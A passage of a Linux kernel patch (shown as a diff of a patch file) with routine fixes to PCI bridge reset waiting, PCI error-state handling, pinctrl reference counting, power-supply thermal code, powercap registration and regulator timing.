++ * side of the bridge are permitted after D3cold to D0 transition
++ * or Conventional Reset.
+  *
+  * For PCIe this means the delays in PCIe 5.0 section 6.6.1. For
+  * conventional PCI it means Tpvrh + Trhfa specified in PCI 3.0 section
+  * 4.3.2.
++ *
++ * Return 0 on success or -ENOTTY if the first device on the secondary bus
++ * failed to become accessible.
+  */
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout)
+ {
+ 	struct pci_dev *child;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+-		return;
++		return 0;
+ 
+-	if (!pci_is_bridge(dev) || !dev->bridge_d3)
+-		return;
++	if (!pci_is_bridge(dev))
++		return 0;
+ 
+ 	down_read(&pci_bus_sem);
+ 
+@@ -4970,14 +4974,14 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 */
+ 	if (!dev->subordinate || list_empty(&dev->subordinate->devices)) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/* Take d3cold_delay requirements into account */
+ 	delay = pci_bus_max_d3cold_delay(dev->subordinate);
+ 	if (!delay) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+@@ -4986,14 +4990,12 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 
+ 	/*
+ 	 * Conventional PCI and PCI-X we need to wait Tpvrh + Trhfa before
+-	 * accessing the device after reset (that is 1000 ms + 100 ms). In
+-	 * practice this should not be needed because we don't do power
+-	 * management for them (see pci_bridge_d3_possible()).
++	 * accessing the device after reset (that is 1000 ms + 100 ms).
+ 	 */
+ 	if (!pci_is_pcie(dev)) {
+ 		pci_dbg(dev, "waiting %d ms for secondary bus\n", 1000 + delay);
+ 		msleep(1000 + delay);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -5010,11 +5012,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 * configuration requests if we only wait for 100 ms (see
+ 	 * https://bugzilla.kernel.org/show_bug.cgi?id=203885).
+ 	 *
+-	 * Therefore we wait for 100 ms and check for the device presence.
+-	 * If it is still not present give it an additional 100 ms.
++	 * Therefore we wait for 100 ms and check for the device presence
++	 * until the timeout expires.
+ 	 */
+ 	if (!pcie_downstream_port(dev))
+-		return;
++		return 0;
+ 
+ 	if (pcie_get_speed_cap(dev) <= PCIE_SPEED_5_0GT) {
+ 		pci_dbg(dev, "waiting %d ms for downstream link\n", delay);
+@@ -5025,14 +5027,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 		if (!pcie_wait_for_link_delay(dev, true, delay)) {
+ 			/* Did not train, no need to wait any further */
+ 			pci_info(dev, "Data Link Layer Link Active not set in 1000 msec\n");
+-			return;
++			return -ENOTTY;
+ 		}
+ 	}
+ 
+-	if (!pci_device_is_present(child)) {
+-		pci_dbg(child, "waiting additional %d ms to become accessible\n", delay);
+-		msleep(delay);
+-	}
++	return pci_dev_wait(child, reset_type, timeout - delay);
+ }
+ 
+ void pci_reset_secondary_bus(struct pci_dev *dev)
+@@ -5051,15 +5050,6 @@ void pci_reset_secondary_bus(struct pci_dev *dev)
+ 
+ 	ctrl &= ~PCI_BRIDGE_CTL_BUS_RESET;
+ 	pci_write_config_word(dev, PCI_BRIDGE_CONTROL, ctrl);
+-
+-	/*
+-	 * Trhfa for conventional PCI is 2^25 clock cycles.
+-	 * Assuming a minimum 33MHz clock this results in a 1s
+-	 * delay before we can consider subordinate devices to
+-	 * be re-initialized.  PCIe has some ways to shorten this,
+-	 * but we don't make use of them yet.
+-	 */
+-	ssleep(1);
+ }
+ 
+ void __weak pcibios_reset_secondary_bus(struct pci_dev *dev)
+@@ -5078,7 +5068,8 @@ int pci_bridge_secondary_bus_reset(struct pci_dev *dev)
+ {
+ 	pcibios_reset_secondary_bus(dev);
+ 
+-	return pci_dev_wait(dev, "bus reset", PCIE_RESET_READY_POLL_MS);
++	return pci_bridge_wait_for_secondary_bus(dev, "bus reset",
++						 PCIE_RESET_READY_POLL_MS);
+ }
+ EXPORT_SYMBOL_GPL(pci_bridge_secondary_bus_reset);
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ce169b12a8f6d..ffccb03933e27 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -63,6 +63,19 @@ struct pci_cap_saved_state *pci_find_saved_ext_cap(struct pci_dev *dev,
+ #define PCI_PM_D3HOT_WAIT       10	/* msec */
+ #define PCI_PM_D3COLD_WAIT      100	/* msec */
+ 
++/*
++ * Following exit from Conventional Reset, devices must be ready within 1 sec
++ * (PCIe r6.0 sec 6.6.1).  A D3cold to D0 transition implies a Conventional
++ * Reset (PCIe r6.0 sec 5.8).
++ */
++#define PCI_RESET_WAIT		1000	/* msec */
++/*
++ * Devices may extend the 1 sec period through Request Retry Status completions
++ * (PCIe r6.0 sec 2.3.1).  The spec does not provide an upper limit, but 60 sec
++ * ought to be enough for any device to become responsive.
++ */
++#define PCIE_RESET_READY_POLL_MS 60000	/* msec */
++
+ void pci_update_current_state(struct pci_dev *dev, pci_power_t state);
+ void pci_refresh_power_state(struct pci_dev *dev);
+ int pci_power_up(struct pci_dev *dev);
+@@ -85,8 +98,9 @@ void pci_msi_init(struct pci_dev *dev);
+ void pci_msix_init(struct pci_dev *dev);
+ bool pci_bridge_d3_possible(struct pci_dev *dev);
+ void pci_bridge_d3_update(struct pci_dev *dev);
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev);
+ void pci_bridge_reconfigure_ltr(struct pci_dev *dev);
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout);
+ 
+ static inline void pci_wakeup_event(struct pci_dev *dev)
+ {
+@@ -309,53 +323,36 @@ struct pci_sriov {
+  * @dev: PCI device to set new error_state
+  * @new: the state we want dev to be in
+  *
+- * Must be called with device_lock held.
++ * If the device is experiencing perm_failure, it has to remain in that state.
++ * Any other transition is allowed.
+  *
+  * Returns true if state has been changed to the requested state.
+  */
+ static inline bool pci_dev_set_io_state(struct pci_dev *dev,
+ 					pci_channel_state_t new)
+ {
+-	bool changed = false;
++	pci_channel_state_t old;
+ 
+-	device_lock_assert(&dev->dev);
+ 	switch (new) {
+ 	case pci_channel_io_perm_failure:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-		case pci_channel_io_perm_failure:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		xchg(&dev->error_state, pci_channel_io_perm_failure);
++		return true;
+ 	case pci_channel_io_frozen:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_normal,
++			      pci_channel_io_frozen);
++		return old != pci_channel_io_perm_failure;
+ 	case pci_channel_io_normal:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_frozen,
++			      pci_channel_io_normal);
++		return old != pci_channel_io_perm_failure;
++	default:
++		return false;
+ 	}
+-	if (changed)
+-		dev->error_state = new;
+-	return changed;
+ }
+ 
+ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ {
+-	device_lock(&dev->dev);
+ 	pci_dev_set_io_state(dev, pci_channel_io_perm_failure);
+-	device_unlock(&dev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index f5ffea17c7f87..a5d7c69b764e0 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -170,8 +170,8 @@ pci_ers_result_t dpc_reset_link(struct pci_dev *pdev)
+ 	pci_write_config_word(pdev, cap + PCI_EXP_DPC_STATUS,
+ 			      PCI_EXP_DPC_STATUS_TRIGGER);
+ 
+-	if (!pcie_wait_for_link(pdev, true)) {
+-		pci_info(pdev, "Data Link Layer Link Active not set in 1000 msec\n");
++	if (pci_bridge_wait_for_secondary_bus(pdev, "DPC",
++					      PCIE_RESET_READY_POLL_MS)) {
+ 		clear_bit(PCI_DPC_RECOVERED, &pdev->priv_flags);
+ 		ret = PCI_ERS_RESULT_DISCONNECT;
+ 	} else {
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 1d6f7b502020d..90e676439170b 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -994,7 +994,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->end)
++		if (!res->flags && !res->start && !res->end)
+ 			continue;
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 285acc4aaccc1..20ac67d590348 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5340,6 +5340,7 @@ static void quirk_no_flr(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x1487, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x148c, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x149c, quirk_no_flr);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 75be4fe225090..0c1faa6c1973a 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -606,21 +606,20 @@ static ssize_t switchtec_dev_read(struct file *filp, char __user *data,
+ 	rc = copy_to_user(data, &stuser->return_code,
+ 			  sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	data += sizeof(stuser->return_code);
+ 	rc = copy_to_user(data, &stuser->data,
+ 			  size - sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	stuser_set_state(stuser, MRPC_IDLE);
+ 
+-out:
+ 	mutex_unlock(&stdev->mrpc_mutex);
+ 
+ 	if (stuser->status == SWITCHTEC_MRPC_STATUS_DONE ||
+diff --git a/drivers/phy/mediatek/phy-mtk-io.h b/drivers/phy/mediatek/phy-mtk-io.h
+index d20ad5e5be814..58f06db822cb0 100644
+--- a/drivers/phy/mediatek/phy-mtk-io.h
++++ b/drivers/phy/mediatek/phy-mtk-io.h
+@@ -39,8 +39,8 @@ static inline void mtk_phy_update_bits(void __iomem *reg, u32 mask, u32 val)
+ /* field @mask shall be constant and continuous */
+ #define mtk_phy_update_field(reg, mask, val) \
+ ({ \
+-	typeof(mask) mask_ = (mask);	\
+-	mtk_phy_update_bits(reg, mask_, FIELD_PREP(mask_, val)); \
++	BUILD_BUG_ON_MSG(!__builtin_constant_p(mask), "mask is not constant"); \
++	mtk_phy_update_bits(reg, mask, FIELD_PREP(mask, val)); \
+ })
+ 
+ #endif
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index d76440ae10ff4..6aea512e5d4ee 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -821,10 +821,10 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	mode = MODE_DFP_USB;
+ 	id = EXTCON_USB_HOST;
+ 
+-	if (ufp) {
++	if (ufp > 0) {
+ 		mode = MODE_UFP_USB;
+ 		id = EXTCON_USB;
+-	} else if (dp) {
++	} else if (dp > 0) {
+ 		mode = MODE_DFP_DP;
+ 		id = EXTCON_DISP_DP;
+ 
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 7857e612a1008..c7cdccdb4332a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -363,8 +363,6 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ {
+ 	struct pinctrl_dev *pctldev = of_pinctrl_get(np);
+ 
+-	of_node_put(np);
+-
+ 	if (!pctldev)
+ 		return 0;
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index 74517e8109585..ad873bd051b68 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -635,7 +635,7 @@ static int mtk_hw_get_value_wrap(struct mtk_pinctrl *hw, unsigned int gpio, int
+ ssize_t mtk_pctrl_show_one_pin(struct mtk_pinctrl *hw,
+ 	unsigned int gpio, char *buf, unsigned int buf_len)
+ {
+-	int pinmux, pullup, pullen, len = 0, r1 = -1, r0 = -1, rsel = -1;
++	int pinmux, pullup = 0, pullen = 0, len = 0, r1 = -1, r0 = -1, rsel = -1;
+ 	const struct mtk_pin_desc *desc;
+ 	u32 try_all_type = 0;
+ 
+@@ -712,7 +712,7 @@ static void mtk_pctrl_dbg_show(struct pinctrl_dev *pctldev, struct seq_file *s,
+ 			  unsigned int gpio)
+ {
+ 	struct mtk_pinctrl *hw = pinctrl_dev_get_drvdata(pctldev);
+-	char buf[PIN_DBG_BUF_SZ];
++	char buf[PIN_DBG_BUF_SZ] = { 0 };
+ 
+ 	(void)mtk_pctrl_show_one_pin(hw, gpio, buf, PIN_DBG_BUF_SZ);
+ 
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 82b921fd630d5..7f193f2b1566a 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1120,8 +1120,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		pin_desc[i].number = i;
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+-		pin_desc[i].name = kasprintf(GFP_KERNEL, "P%c%d",
+-					     bank + 'A', line);
++		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
++						  bank + 'A', line);
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index 81dbffab621fb..ff3b6a8a0b170 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1883,7 +1883,7 @@ static int at91_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	for (i = 0; i < chip->ngpio; i++)
+-		names[i] = kasprintf(GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
++		names[i] = devm_kasprintf(&pdev->dev, GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
+ 
+ 	chip->names = (const char *const *)names;
+ 
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 5eeac92f610a0..0276b52f37168 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3045,6 +3045,7 @@ static int rockchip_pinctrl_parse_groups(struct device_node *np,
+ 		np_config = of_find_node_by_phandle(be32_to_cpup(phandle));
+ 		ret = pinconf_generic_parse_dt_config(np_config, NULL,
+ 				&grp->data[j].configs, &grp->data[j].nconfigs);
++		of_node_put(np_config);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/pinctrl/qcom/pinctrl-msm8976.c b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+index ec43edf9b660a..e11d845847190 100644
+--- a/drivers/pinctrl/qcom/pinctrl-msm8976.c
++++ b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+@@ -733,7 +733,7 @@ static const char * const codec_int2_groups[] = {
+ 	"gpio74",
+ };
+ static const char * const wcss_bt_groups[] = {
+-	"gpio39", "gpio47", "gpio88",
++	"gpio39", "gpio47", "gpio48",
+ };
+ static const char * const sdc3_groups[] = {
+ 	"gpio39", "gpio40", "gpio41",
+@@ -958,9 +958,9 @@ static const struct msm_pingroup msm8976_groups[] = {
+ 	PINGROUP(37, NA, NA, NA, qdss_tracedata_b, NA, NA, NA, NA, NA),
+ 	PINGROUP(38, NA, NA, NA, NA, NA, NA, NA, qdss_tracedata_b, NA),
+ 	PINGROUP(39, wcss_bt, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(40, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(41, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(42, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(40, wcss_wlan2, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(41, wcss_wlan1, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(42, wcss_wlan0, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+ 	PINGROUP(43, wcss_wlan, sdc3, NA, NA, qdss_tracedata_a, NA, NA, NA, NA),
+ 	PINGROUP(44, wcss_wlan, sdc3, NA, NA, NA, NA, NA, NA, NA),
+ 	PINGROUP(45, wcss_fm, NA, qdss_tracectl_a, NA, NA, NA, NA, NA, NA),
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index a43824fd9505f..ca6303fc41f98 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -127,6 +127,7 @@ struct rzg2l_dedicated_configs {
+ struct rzg2l_pinctrl_data {
+ 	const char * const *port_pins;
+ 	const u32 *port_pin_configs;
++	unsigned int n_ports;
+ 	struct rzg2l_dedicated_configs *dedicated_pins;
+ 	unsigned int n_port_pins;
+ 	unsigned int n_dedicated_pins;
+@@ -1122,7 +1123,7 @@ static struct {
+ 	}
+ };
+ 
+-static int rzg2l_gpio_get_gpioint(unsigned int virq)
++static int rzg2l_gpio_get_gpioint(unsigned int virq, const struct rzg2l_pinctrl_data *data)
+ {
+ 	unsigned int gpioint;
+ 	unsigned int i;
+@@ -1131,13 +1132,13 @@ static int rzg2l_gpio_get_gpioint(unsigned int virq)
+ 	port = virq / 8;
+ 	bit = virq % 8;
+ 
+-	if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++	if (port >= data->n_ports ||
++	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[port]))
+ 		return -EINVAL;
+ 
+ 	gpioint = bit;
+ 	for (i = 0; i < port; i++)
+-		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[i]);
++		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[i]);
+ 
+ 	return gpioint;
+ }
+@@ -1237,7 +1238,7 @@ static int rzg2l_gpio_child_to_parent_hwirq(struct gpio_chip *gc,
+ 	unsigned long flags;
+ 	int gpioint, irq;
+ 
+-	gpioint = rzg2l_gpio_get_gpioint(child);
++	gpioint = rzg2l_gpio_get_gpioint(child, pctrl->data);
+ 	if (gpioint < 0)
+ 		return gpioint;
+ 
+@@ -1311,8 +1312,8 @@ static void rzg2l_init_irq_valid_mask(struct gpio_chip *gc,
+ 		port = offset / 8;
+ 		bit = offset % 8;
+ 
+-		if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++		if (port >= pctrl->data->n_ports ||
++		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(pctrl->data->port_pin_configs[port]))
+ 			clear_bit(offset, valid_mask);
+ 	}
+ }
+@@ -1517,6 +1518,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = r9a07g043_gpio_configs,
++	.n_ports = ARRAY_SIZE(r9a07g043_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(r9a07g043_gpio_configs) * RZG2L_PINS_PER_PORT,
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common),
+@@ -1525,6 +1527,7 @@ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ static struct rzg2l_pinctrl_data r9a07g044_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = rzg2l_gpio_configs,
++	.n_ports = ARRAY_SIZE(rzg2l_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(rzg2l_gpio_names),
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common) +
+diff --git a/drivers/pinctrl/stm32/pinctrl-stm32.c b/drivers/pinctrl/stm32/pinctrl-stm32.c
+index e485506ea599c..e198233c10bad 100644
+--- a/drivers/pinctrl/stm32/pinctrl-stm32.c
++++ b/drivers/pinctrl/stm32/pinctrl-stm32.c
+@@ -1380,6 +1380,7 @@ static struct irq_domain *stm32_pctrl_get_irq_domain(struct platform_device *pde
+ 		return ERR_PTR(-ENXIO);
+ 
+ 	domain = irq_find_host(parent);
++	of_node_put(parent);
+ 	if (!domain)
+ 		/* domain not registered yet */
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 59de4ce01faba..a74d01e9089e1 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -27,7 +27,7 @@
+ #define DRV_NAME "cros-ec-typec"
+ 
+ #define DP_PORT_VDO	(DP_CONF_SET_PIN_ASSIGN(BIT(DP_PIN_ASSIGN_C) | BIT(DP_PIN_ASSIGN_D)) | \
+-				DP_CAP_DFP_D)
++				DP_CAP_DFP_D | DP_CAP_RECEPTACLE)
+ 
+ /* Supported alt modes. */
+ enum {
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 01d1ac79d982e..8382be867d274 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -1187,83 +1187,6 @@ static void psy_unregister_thermal(struct power_supply *psy)
+ 	thermal_zone_device_unregister(psy->tzd);
+ }
+ 
+-/* thermal cooling device callbacks */
+-static int ps_get_max_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT_MAX, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_get_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_set_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	val.intval = state;
+-	ret = psy->desc->set_property(psy,
+-		POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-
+-	return ret;
+-}
+-
+-static const struct thermal_cooling_device_ops psy_tcd_ops = {
+-	.get_max_state = ps_get_max_charge_cntl_limit,
+-	.get_cur_state = ps_get_cur_charge_cntl_limit,
+-	.set_cur_state = ps_set_cur_charge_cntl_limit,
+-};
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	/* Register for cooling device if psy can control charging */
+-	if (psy_has_property(psy->desc, POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT)) {
+-		psy->tcd = thermal_cooling_device_register(
+-			(char *)psy->desc->name,
+-			psy, &psy_tcd_ops);
+-		return PTR_ERR_OR_ZERO(psy->tcd);
+-	}
+-
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-	if (IS_ERR_OR_NULL(psy->tcd))
+-		return;
+-	thermal_cooling_device_unregister(psy->tcd);
+-}
+ #else
+ static int psy_register_thermal(struct power_supply *psy)
+ {
+@@ -1273,15 +1196,6 @@ static int psy_register_thermal(struct power_supply *psy)
+ static void psy_unregister_thermal(struct power_supply *psy)
+ {
+ }
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-}
+ #endif
+ 
+ static struct power_supply *__must_check
+@@ -1355,10 +1269,6 @@ __power_supply_register(struct device *parent,
+ 	if (rc)
+ 		goto register_thermal_failed;
+ 
+-	rc = psy_register_cooler(psy);
+-	if (rc)
+-		goto register_cooler_failed;
+-
+ 	rc = power_supply_create_triggers(psy);
+ 	if (rc)
+ 		goto create_triggers_failed;
+@@ -1388,8 +1298,6 @@ __power_supply_register(struct device *parent,
+ add_hwmon_sysfs_failed:
+ 	power_supply_remove_triggers(psy);
+ create_triggers_failed:
+-	psy_unregister_cooler(psy);
+-register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+ wakeup_init_failed:
+@@ -1541,7 +1449,6 @@ void power_supply_unregister(struct power_supply *psy)
+ 	sysfs_remove_link(&psy->dev.kobj, "powers");
+ 	power_supply_remove_hwmon_sysfs(psy);
+ 	power_supply_remove_triggers(psy);
+-	psy_unregister_cooler(psy);
+ 	psy_unregister_thermal(psy);
+ 	device_init_wakeup(&psy->dev, false);
+ 	device_unregister(&psy->dev);
+diff --git a/drivers/powercap/powercap_sys.c b/drivers/powercap/powercap_sys.c
+index f0654a932b372..ff736b006198f 100644
+--- a/drivers/powercap/powercap_sys.c
++++ b/drivers/powercap/powercap_sys.c
+@@ -529,9 +529,6 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->name = kstrdup(name, GFP_KERNEL);
+ 	if (!power_zone->name)
+ 		goto err_name_alloc;
+-	dev_set_name(&power_zone->dev, "%s:%x",
+-					dev_name(power_zone->dev.parent),
+-					power_zone->id);
+ 	power_zone->constraints = kcalloc(nr_constraints,
+ 					  sizeof(*power_zone->constraints),
+ 					  GFP_KERNEL);
+@@ -554,9 +551,16 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->dev_attr_groups[0] = &power_zone->dev_zone_attr_group;
+ 	power_zone->dev_attr_groups[1] = NULL;
+ 	power_zone->dev.groups = power_zone->dev_attr_groups;
++	dev_set_name(&power_zone->dev, "%s:%x",
++					dev_name(power_zone->dev.parent),
++					power_zone->id);
+ 	result = device_register(&power_zone->dev);
+-	if (result)
+-		goto err_dev_ret;
++	if (result) {
++		put_device(&power_zone->dev);
++		mutex_unlock(&control_type->lock);
++
++		return ERR_PTR(result);
++	}
+ 
+ 	control_type->nr_zones++;
+ 	mutex_unlock(&control_type->lock);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 3716ba060368c..cdac193634e07 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1584,7 +1584,7 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+@@ -2673,7 +2673,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 		 * this regulator was disabled.
+ 		 */
+ 		ktime_t end = ktime_add_us(rdev->last_off, rdev->desc->off_on_delay);
+-		s64 remaining = ktime_us_delta(end, ktime_get());
++		s64 remaining = ktime_us_delta(end, ktime_get_boottime());
+ 
+ 		if (remaining > 0)
+ 			_regulator_delay_helper(remaining);
+@@ -2912,7 +2912,7 @@ static int _regulator_do_disable(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
